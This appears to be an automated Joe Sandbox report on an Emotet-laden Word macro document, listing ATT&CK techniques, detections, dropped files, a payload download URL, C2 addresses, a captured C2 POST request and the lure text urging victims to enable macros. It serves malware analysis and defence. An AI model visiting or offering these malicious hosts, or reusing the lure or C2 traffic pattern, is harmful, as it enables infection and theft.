
Analysis Report gyF9tONev4

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 206257
Start date: 06.02.2020
Start time: 04:37:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: gyF9tONev4 (renamed file extension from none to docm)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winDOCM@8/11@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 29.1% (good quality ratio 27.7%)
  • Quality average: 82.7%
  • Quality standard deviation: 25.8%
HCA Information:
  • Successful, ratio: 65%
  • Number of executed functions: 73
  • Number of non-executed functions: 368
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | - | false | Emotet | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | -


Classification

Analysis Advice

Sample may offer command line options; please run it with the 'Execute binary with arguments' cookbook (the command line switches may require additional characters such as "-", "/" or "--").



MITRE ATT&CK Matrix

(Each row lists one technique per tactic column; a bracketed number is the per-technique count from the report, "-" marks an empty cell.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (1) | Windows Management Instrumentation (11) | Hidden Files and Directories (1) | Valid Accounts (1) | Disabling Security Tools (11) | Input Capture (1) | System Time Discovery (2) | Remote File Copy (3) | Input Capture (1) | Data Encrypted (11) | Uncommonly Used Port (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1)
Replication Through Removable Media | PowerShell (4) | Valid Accounts (1) | Access Token Manipulation (1) | Software Packing (1) | Network Sniffing | Security Software Discovery (12) | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Commonly Used Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting (2) | Modify Existing Service (11) | Process Injection (1) | Deobfuscate/Decode Files or Information (11) | Input Capture | System Service Discovery (1) | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Remote File Copy (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API (131) | New Service (2) | New Service (2) | Scripting (2) | Credentials in Files | File and Directory Discovery (3) | Logon Scripts | Input Capture | Data Encrypted | Standard Cryptographic Protocol (2) | SIM Card Swap | - | Premium SMS Toll Fraud
Exploit Public-Facing Application | Exploitation for Client Execution (3) | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information (1) | Account Manipulation | System Information Discovery (38) | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol (3) | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface (1) | Modify Existing Service | New Service | Obfuscated Files or Information (2) | Brute Force | Virtualization/Sandbox Evasion (2) | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol (13) | Jamming or Denial of Service | - | Abuse Accessibility Features
Spearphishing Attachment | Command-Line Interface (113) | Path Interception | Scheduled Task | Masquerading (221) | Two-Factor Authentication Interception | Process Discovery (2) | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Spearphishing via Service | Service Execution (12) | Logon Scripts | Process Injection | Hidden Files and Directories (1) | Bash History | Application Window Discovery (1) | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Valid Accounts (1) | Input Prompt | Remote System Discovery (1) | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | - | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Virtualization/Sandbox Evasion (2) | Keychain | Process Discovery | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | - | - | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | Access Token Manipulation (1) | Private Keys | Security Software Discovery | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | - | - | Disk Structure Wipe
Masquerade as Legitimate Application | Regsvr32 | New Service | Bypass User Account Control | Process Injection (1) | Securityd Memory | Permission Groups Discovery | Pass the Ticket | Man in the Browser | Alternate Network Mediums | Custom Command and Control Protocol | - | - | Disk Content Wipe

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://bolehprediksi.com/wp-includes/ifrEFSqSw/ | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\209.exe | Avira: detection malicious, Label: TR/AD.Emotet.lnvbd
Found malware configuration
Source: dvbthunk.exe.2356.6.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["45.55.179.121:8080", "45.55.179.121/juH7pVdg5"]}
Multi AV Scanner detection for domain / URL
Source: bolehprediksi.com | Virustotal: Detection: 16%
Source: http://bolehprediksi.com/wp-includes/ifrEFSqSw/ | Virustotal: Detection: 22%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\209.exe | Virustotal: Detection: 77%
Multi AV Scanner detection for submitted file
Source: gyF9tONev4.docm | Virustotal: Detection: 63%
Machine Learning detection for dropped file
Source: C:\Users\user\209.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: gyF9tONev4.docm | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.209.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.lnvbd
Source: 3.0.209.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.lnvbd
Source: 5.0.dvbthunk.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.lnvbd
Source: 6.0.dvbthunk.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.lnvbd

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\209.exe | Code function: 4_2_003E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
Source: C:\Users\user\209.exe | Code function: 4_2_003E1F11 CryptExportKey
Source: C:\Users\user\209.exe | Code function: 4_2_003E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Users\user\209.exe | Code function: 4_2_003E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
Source: C:\Users\user\209.exe | Code function: 4_2_003E1F56 CryptGetHashParam
Source: C:\Users\user\209.exe | Code function: 4_2_003E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_0021207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211F11 CryptExportKey
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211F56 CryptGetHashParam
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_0021215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\209.exe | Code function: 3_2_004305BD lstrlenA,FindFirstFileA,FindClose
Source: C:\Users\user\209.exe | Code function: 3_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: bolehprediksi.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 43.255.154.93:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 43.255.154.93:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.2:49159 -> 45.55.179.121:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.2:49159 -> 45.55.179.121:8080
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /wp-includes/ifrEFSqSw/ HTTP/1.1 | Host: bolehprediksi.com | Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /juH7pVdg5 HTTP/1.1 | Referer: http://45.55.179.121/juH7pVdg5 | Content-Type: application/x-www-form-urlencoded | DNT: 1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 45.55.179.121:8080 | Content-Length: 468 | Connection: Keep-Alive | Cache-Control: no-cache
Data Raw: 6a 75 48 37 70 56 64 67 35 3d 75 75 56 45 43 35 25 32 42 44 6e 50 57 6b 58 5a 73 65 7a 4d 75 6e 58 42 34 35 49 7a 47 53 6d 61 54 79 42 73 69 70 71 6a 71 55 41 45 49 54 73 52 75 31 48 25 32 42 70 74 25 32 46 6b 50 46 4d 76 51 62 4c 53 7a 75 73 53 56 6e 25 32 42 61 75 48 76 63 4f 52 70 71 63 6f 35 25 32 42 44 25 32 42 72 30 49 6e 44 42 41 64 6f 65 6f 77 51 79 32 69 4b 4f 4d 72 43 4f 6c 57 59 78 55 6f 78 6e 61 62 4f 48 61 32 36 49 5a 55 66 74 42 44 6f 35 34 41 69 30 66 71 73 38 6d 67 6f 35 44 51 37 7a 25 32 46 51 61 35 39 31 25 32 46 4f 6a 31 6a 79 6e 67 5a 34 54 46 4a 7a 39 4b 48 52 36 50 7a 25 32 46 41 4b 68 38 5a 6d 74 74 70 54 46 4c 6b 69 39 77 6b 63 36 57 5a 54 4e 49 4c 78 63 69 67 69 31 38 43 73 77 79 41 6d 55 53 47 4b 37 33 64 51 72 66 34 4c 52 4c 6d 54 66 52 78 6f 54 5a 71 5a 39 37 32 32 6f 66 48 46 42 71 53 43 59 73 43 59 5a 6a 4b 6a 4b 67 46 66 7a 75 74 31 6e 77 4b 63 50 38 34 25 32 42 4b 4b 5a 62 33 64 6c 56 49 6c 67 46 43 67 56 4b 75 71 56 62 78 30 44 37 35 71 4a 45 4f 32 38 36 7a 57 75 65 4c 76 56 32 56 45 4c 42 46 76 58 62 52 6f 25 32 46 64 57 65 74 71 6c 42 5a 68 55 7a 39 50 73 73 52 6e 34 6a 41 39 59 79 64 5a 5a 34 42 56 54 32 69 54 36 42 56 46 57 6a 77 73 4a 31 57 64 6d 51 25 32 46 53 41 51 34 35 37 46 69 68 48 69 39 37 6c 44 6e 47 25 32 46 7a 38 54 53 36 34 30 49 45 78 56 35 32 59 6c 6f 4c 73 50 4a 4d 73 4f 74 79 74 4a 6b 54 33 49 6e 47 70 42 6a 56 71 4f 4a 4f 45 6d
Data Ascii: juH7pVdg5=uuVEC5%2BDnPWkXZsezMunXB45IzGSmaTyBsipqjqUAEITsRu1H%2Bpt%2FkPFMvQbLSzusSVn%2BauHvcORpqco5%2BD%2Br0InDBAdoeowQy2iKOMrCOlWYxUoxnabOHa26IZUftBDo54Ai0fqs8mgo5DQ7z%2FQa591%2FOj1jyngZ4TFJz9KHR6Pz%2FAKh8ZmttpTFLki9wkc6WZTNILxcigi18CswyAmUSGK73dQrf4LRLmTfRxoTZqZ9722ofHFBqSCYsCYZjKjKgFfzut1nwKcP84%2BKKZb3dlVIlgFCgVKuqVbx0D75qJEO286zWueLvV2VELBFvXbRo%2FdWetqlBZhUz9PssRn4jA9YydZZ4BVT2iT6BVFWjwsJ1WdmQ%2FSAQ457FihHi97lDnG%2Fz8TS640IExV52YloLsPJMsOtytJkT3InGpBjVqOJOEm
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 45.55.179.121 (this entry is reported 12 times)
Contains functionality to download additional files from the internet
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211383 InternetReadFile
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /wp-includes/ifrEFSqSw/ HTTP/1.1 | Host: bolehprediksi.com | Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: bolehprediksi.com
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /juH7pVdg5 HTTP/1.1 (the same request, headers and body as listed above under "Uses a known web browser user agent for HTTP communication")
Urls found in memory or binary data
Source: dvbthunk.exe, 00000006.00000002.1796251909.00303000.00000004.00000020.sdmp, dvbthunk.exe, 00000006.00000002.1796123834.0012B000.00000004.00000001.sdmp | String found in binary or memory: http://45.55.179.121/juH7pVdg5
Source: 209.exe, 00000003.00000002.972678668.00489000.00000002.00020000.sdmp, 209.exe, 00000004.00000000.971931751.00489000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000002.1005004120.00489000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004320231.00489000.00000002.00020000.sdmp, 209.exe.1.dr | String found in binary or memory: http://www.codeproject.com/KB/dialog/xfontdialog.aspx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\209.exe | Code function: 3_2_0042E2A3 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA
Source: C:\Users\user\209.exe | Code function: 3_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA
Source: C:\Users\user\209.exe | Code function: 3_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Users\user\209.exe | Code function: 3_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\209.exe | Code function: 3_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\209.exe | Code function: 3_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\209.exe | Code function: 3_2_00437FA6 GetKeyState,GetKeyState,GetKeyState

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\209.exe | Code function: 4_2_003EE20C
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_0021E20C
Malicious encrypted Powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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
Yara detected Emotet
Source: Yara match | File source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\209.exe | Code function: 4_2_003E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\System32\dvbthunk.exe | Code function: 6_2_00211F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4Screenshot OCR: Enable content button. a 13,2 '00%Q A GE)
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\209.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2291
Contains functionality to delete servicesShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003EE3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_003EE3D8
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003E1D2B CreateProcessAsUserW,CreateProcessW,4_2_003E1D2B
Detected potential crypto functionShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0045400D3_2_0045400D
Source: C:\Users\user\209.exeCode function: 3_2_0044A0903_2_0044A090
Source: C:\Users\user\209.exeCode function: 3_2_004601D23_2_004601D2
Source: C:\Users\user\209.exeCode function: 3_2_0044C59A3_2_0044C59A
Source: C:\Users\user\209.exeCode function: 3_2_004607163_2_00460716
Source: C:\Users\user\209.exeCode function: 3_2_00446BF63_2_00446BF6
Source: C:\Users\user\209.exeCode function: 3_2_0043CDE83_2_0043CDE8
Source: C:\Users\user\209.exeCode function: 3_2_00460D863_2_00460D86
Source: C:\Users\user\209.exeCode function: 3_2_004610013_2_00461001
Source: C:\Users\user\209.exeCode function: 3_2_0043D2BD3_2_0043D2BD
Source: C:\Users\user\209.exeCode function: 3_2_004613063_2_00461306
Source: C:\Users\user\209.exeCode function: 3_2_0045B40D3_2_0045B40D
Source: C:\Users\user\209.exeCode function: 3_2_0045B60B3_2_0045B60B
Source: C:\Users\user\209.exeCode function: 3_2_0044D6213_2_0044D621
Source: C:\Users\user\209.exeCode function: 3_2_0043D6913_2_0043D691
Source: C:\Users\user\209.exeCode function: 3_2_00461ACA3_2_00461ACA
Source: C:\Users\user\209.exeCode function: 3_2_00423AE83_2_00423AE8
Source: C:\Users\user\209.exeCode function: 3_2_0043DA9D3_2_0043DA9D
Source: C:\Users\user\209.exeCode function: 3_2_00463B1C3_2_00463B1C
Source: C:\Users\user\209.exeCode function: 3_2_00457C433_2_00457C43
Source: C:\Users\user\209.exeCode function: 3_2_0045FCA73_2_0045FCA7
Source: C:\Users\user\209.exeCode function: 3_2_0040BDDB3_2_0040BDDB
Source: C:\Users\user\209.exeCode function: 3_2_0043DEBD3_2_0043DEBD
Source: C:\Users\user\209.exeCode function: 3_2_003C28C13_2_003C28C1
Source: C:\Users\user\209.exeCode function: 3_2_003C30E83_2_003C30E8
Source: C:\Users\user\209.exeCode function: 3_2_003C30E43_2_003C30E4
Source: C:\Users\user\209.exeCode function: 3_2_003E37A93_2_003E37A9
Source: C:\Users\user\209.exeCode function: 3_2_003E37A53_2_003E37A5
Source: C:\Users\user\209.exeCode function: 3_2_003E2F823_2_003E2F82
Source: C:\Users\user\209.exeCode function: 4_2_001F28C14_2_001F28C1
Source: C:\Users\user\209.exeCode function: 4_2_001F30E84_2_001F30E8
Source: C:\Users\user\209.exeCode function: 4_2_001F30E44_2_001F30E4
Source: C:\Users\user\209.exeCode function: 4_2_003E37A94_2_003E37A9
Source: C:\Users\user\209.exeCode function: 4_2_003E37A54_2_003E37A5
Source: C:\Users\user\209.exeCode function: 4_2_003E2F824_2_003E2F82
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002730E45_2_002730E4
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002730E85_2_002730E8
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_002728C15_2_002728C1
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_003937A95_2_003937A9
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_003937A55_2_003937A5
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00392F825_2_00392F82
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F28C16_2_001F28C1
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F30E86_2_001F30E8
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F30E46_2_001F30E4
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_002137A56_2_002137A5
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_002137A96_2_002137A9
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00212F826_2_00212F82
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: gyF9tONev4.docmOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Rmhpjcza, Function Document_openName: Document_open
Document contains embedded VBA macrosShow sources
Source: gyF9tONev4.docmOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: gyF9tONev4.docmOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: gyF9tONev4.docmOLE indicator application name: unknown
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\209.exe 0DDDE52CA3E01FDF8DBAFF394135E34DE7F446D8D47942329F9B9832B3B2246A
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\209.exeCode function: String function: 00403520 appears 35 times
Source: C:\Users\user\209.exeCode function: String function: 0043B240 appears 96 times
Source: C:\Users\user\209.exeCode function: String function: 0043AFA9 appears 36 times
Source: C:\Users\user\209.exeCode function: String function: 00449972 appears 46 times
Source: C:\Users\user\209.exeCode function: String function: 0043AF40 appears 226 times
Source: C:\Users\user\209.exeCode function: String function: 004138C5 appears 35 times
Yara signature matchShow sources
Source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winDOCM@8/11@1/2
Contains functionality to create services
Source: C:\Users\user\209.exe | Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8
Source: C:\Windows\System32\dvbthunk.exe | Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_0021E4A8
Contains functionality to enum processes or threads
Source: C:\Users\user\209.exe | Code function: 3_2_003E1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_003E1943
Contains functionality to instantiate COM classes
Source: C:\Users\user\209.exe | Code function: 3_2_00423866 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,3_2_00423866
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\209.exe | Code function: 3_2_004060CC __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,3_2_004060CC
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\209.exe | Code function: 4_2_003EE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003EE4A8
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$F9tONev4.docm
Creates mutexes
Source: C:\Windows\System32\dvbthunk.exe | Mutant created: \BaseNamedObjects\Global\ID5DCAC04
Source: C:\Users\user\209.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\ID5DCAC04
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\209.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\MD5DCAC04
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE8DA.tmp
Document contains summary information with irregular field values
Source: gyF9tONev4.docm | OLE document summary: title field not present or empty
Source: gyF9tONev4.docm | OLE document summary: author field not present or empty
Source: gyF9tONev4.docm | OLE document summary: edited time not present or 0
Found command line output
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
